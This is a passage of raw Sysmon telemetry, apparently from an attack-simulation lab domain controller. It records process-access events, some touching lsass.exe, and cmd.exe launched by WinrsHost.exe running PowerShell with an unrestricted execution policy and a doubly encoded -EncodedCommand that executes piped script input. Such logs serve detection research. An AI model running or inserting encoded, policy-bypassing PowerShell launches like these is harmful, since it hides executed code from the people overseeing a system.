15:52:09.969{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003337Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7CA9-5FA1-A100-000000008801}23282528C:\Windows\system32\cmd.exe{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003336Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.976{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CA9-5FA1-A100-000000008801}2328C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003335Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003334Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CA9-5FA1-A100-000000008801}2328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003333Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003332Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003331Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003330Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003329Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003328Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003327Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003326Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003325Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003324Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CA9-5FA1-A100-000000008801}2328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003323Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7CA9-5FA1-9F00-000000008801}49604376C:\Windows\system32\WinrsHost.exe{D28789B6-7CA9-5FA1-A100-000000008801}2328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000003322Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.971{D28789B6-7CA9-5FA1-A100-000000008801}2328C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQ